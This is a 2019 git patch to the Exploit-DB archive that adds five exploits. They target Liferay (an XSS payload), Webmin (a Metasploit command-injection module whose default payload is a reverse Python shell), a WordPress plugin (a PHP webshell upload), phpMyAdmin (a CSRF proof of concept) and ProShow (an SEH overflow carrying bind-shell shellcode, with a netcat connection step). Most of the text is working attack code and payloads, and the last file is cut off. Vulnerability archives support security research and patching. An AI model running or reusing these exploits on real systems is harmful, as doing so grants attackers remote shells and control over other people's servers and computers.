From 29aeb0c030c2ea4294dc6e063b95bbe233b8cf0e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 12 Jun 2019 05:01:53 +0000 Subject: [PATCH] DB: 2019-06-12 5 changes to exploits/shellcodes ProShow 9.0.3797 - Local Privilege Escalation Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution phpMyAdmin 4.8 - Cross-Site Request Forgery Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting --- exploits/jsp/webapps/46983.txt | 26 ++++++ exploits/linux/remote/46984.rb | 153 ++++++++++++++++++++++++++++++++ exploits/php/webapps/46981.txt | 22 +++++ exploits/php/webapps/46982.txt | 42 +++++++++ exploits/windows/local/46980.py | 99 +++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 347 insertions(+) create mode 100644 exploits/jsp/webapps/46983.txt create mode 100755 exploits/linux/remote/46984.rb create mode 100644 exploits/php/webapps/46981.txt create mode 100644 exploits/php/webapps/46982.txt create mode 100755 exploits/windows/local/46980.py diff --git a/exploits/jsp/webapps/46983.txt b/exploits/jsp/webapps/46983.txt new file mode 100644 index 000000000..69d88235e --- /dev/null +++ b/exploits/jsp/webapps/46983.txt @@ -0,0 +1,26 @@ +# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS +# Date: 04/06/2019 +# Exploit Author: Valerio Brussani (@val_brux) +# Website: www.valbrux.it +# Vendor Homepage: https://www.liferay.com/ +# Software Link: https://www.liferay.com/it/downloads-community +# Version: < 7.1 CE GA4 +# Tested on: Liferay Portal 7.1 CE GA3 +# CVE: CVE-2019-6588 +# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3 +# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/ + + +Introduction +In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input +into the “url” parameter of the JSP taglib call ” /> or ” />. +A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. + +Poc +In a sample scenario of custom code calling the ” /> JSP taglib, appending a payload like the following to the body parameters of a customized form: + +&xxxx%22%3e%3cscript%3ealert(1) + +The script is reflected in the src attribute of the tag, responsible of fetching the next available captcha: + +”xxx”=” /> \ No newline at end of file diff --git a/exploits/linux/remote/46984.rb b/exploits/linux/remote/46984.rb new file mode 100755 index 000000000..96422462b --- /dev/null +++ b/exploits/linux/remote/46984.rb @@ -0,0 +1,153 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution', + 'Description' => %q( + This module exploits an arbitrary command execution vulnerability in Webmin + 1.910 and lower versions. Any user authorized to the "Package Updates" + module can execute arbitrary commands with root privileges. + + ), + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-'], + ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html'] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'DefaultOptions' => + { + 'RPORT' => 10000, + 'SSL' => false, + 'PAYLOAD' => 'cmd/unix/reverse_python' # its depends + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [['Webmin <= 1.910', {}]], + 'DisclosureDate' => 'May 16 2019', + 'DefaultTarget' => 0) + ) + register_options [ + OptString.new('USERNAME', [true, 'Webmin Username']), + OptString.new('PASSWORD', [true, 'Webmin Password']), + OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) + ] + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'session_login.cgi'), + 'cookie' => 'testing=1', + 'vars_post' => { + 'page' => '', + 'user' => datastore['USERNAME'], + 'pass' => datastore['PASSWORD'] + } + }) + + if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ + return $1 + end + + return nil unless res + '' + end +## +# Target and input verification +## + def check + cookie = login + return CheckCode::Detected if cookie == '' + return CheckCode::Unknown if cookie.nil? + + vprint_status('Attempting to execute...') + # check package update priv + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "package-updates/"), + 'cookie' => "sid=#{cookie}" + }) + + if res && res.code == 200 && res.body =~ /Software Package Update/ + print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") + return CheckCode::Vulnerable + end + print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<") + print_status("Please try with another user account!") + CheckCode::Safe + end +## +# Exploiting phase +## + def exploit + cookie = login + if cookie == '' || cookie.nil? + fail_with(Failure::Unknown, 'Failed to retrieve session cookie') + end + print_good("Session cookie: #{cookie}") + + res = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), + 'headers' => + { + 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" + }, + 'cookie' => "redirect=1; testing=1; sid=#{cookie}" + ) + unless res && res.code == 200 + fail_with(Failure::Unknown, 'Request failed') + end + + print_status("Attempting to execute the payload...") + exec(cookie) + + end + + def exec(cookie) + + command = payload.encoded + + res = send_request_cgi( + { + 'method' => 'POST', + 'cookie' => "sid=#{cookie}", + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), + 'headers' => + { + 'Referer' => "#{peer}/package-updates/?xnavigation=1" + }, + 'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages" + }) + + end +end +## +# The end of the adventure (o_O) // AkkuS +## \ No newline at end of file diff --git a/exploits/php/webapps/46981.txt b/exploits/php/webapps/46981.txt new file mode 100644 index 000000000..011def1cb --- /dev/null +++ b/exploits/php/webapps/46981.txt @@ -0,0 +1,22 @@ +# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin +# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive +# Date: june 2019 +# Exploit Author: xulchibalraa +# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/ +# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip +# Version: 4.2995 <= 4.2997 +# Tested on: Wordpress 5.1.1, PHP 5.6 +# CVE : - + + +## 1. Create a .zip archive with 2 files: index.html, index.php + +echo "hello" > index.html +echo "" > index.php +zip poc.zip index.html index.php + +## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it) +## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;) +## 4. Access the webshell from the URL displayed after upload similar to + +http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami \ No newline at end of file diff --git a/exploits/php/webapps/46982.txt b/exploits/php/webapps/46982.txt new file mode 100644 index 000000000..9ac066e84 --- /dev/null +++ b/exploits/php/webapps/46982.txt @@ -0,0 +1,42 @@ +# Exploit Title: Cross Site Request Forgery (CSRF) +# Date: 11 June 2019 +# Exploit Author: Riemann +# Vendor Homepage: https://www.phpmyadmin.net/ +# Software Link: https://www.phpmyadmin.net/downloads/ +# Version: 4.8 +# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 +# CVE : 2019-12616 + +# Description +# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim. + + +#VULNERABILITY: +The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST +
+ +GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1 + +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Connection: keep-alive +Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133 +Upgrade-Insecure-Requests: 1 +Host: localhost:9000 + +The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method + +#POC + + + + + + POC CVE-2019-12616 + + + +View my Pictures! + + \ No newline at end of file diff --git a/exploits/windows/local/46980.py b/exploits/windows/local/46980.py new file mode 100755 index 000000000..451027015 --- /dev/null +++ b/exploits/windows/local/46980.py @@ -0,0 +1,99 @@ +#!/usr/bin/python +# _*_ coding:utf-8 _*_ + +# Exploit Title: ProShow v9.0.3797 Local Exploit +# Exploit Author: @Yonatan_Correa +# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html +# Vendor Homepage: http://www.photodex.com/ProShow +# Software Link: http://files.photodex.com/release/pspro_90_3797.exe +# Version: v9.0.3797 +# Tested on: Wind 7 + +from struct import pack + +informacion = """ + + ProShow v9.0.3797 + http://www.photodex.com/ProShow + + + execute exploit + create a file called "load" + copy load "C:\Program Files\Photodex\ProShow Producer\" + "C:\Program Files\Photodex\ProShow Producer\proshow.exe" + And connect nc -nv IP_Host 4444 + + Testing: Windows 7 + @Yonatan_Correa + https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html +""" + + +# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c +# Payload size: 717 bytes +shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" +"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b" +"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59" +"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e" +"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52" +"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e" +"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51" +"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42" +"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b" +"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52" +"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49" +"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53" +"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d" +"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53" +"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78" +"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56" +"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b" +"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64" +"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f" +"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c" +"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38" +"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51" +"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71" +"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46" +"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78" +"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30" +"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55" +"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d" +"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b" +"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a" +"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34" +"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33" +"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38" +"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76" +"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66" +"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76" +"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70" +"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56" +"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59" +"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70" +"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47" +"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54" +"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f" +"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b" +"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f" +"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41") + +junk = shell + ("\x41" * 9479) # 10204 +nseh = "\xEB\x06\x90\x90" +seh = pack('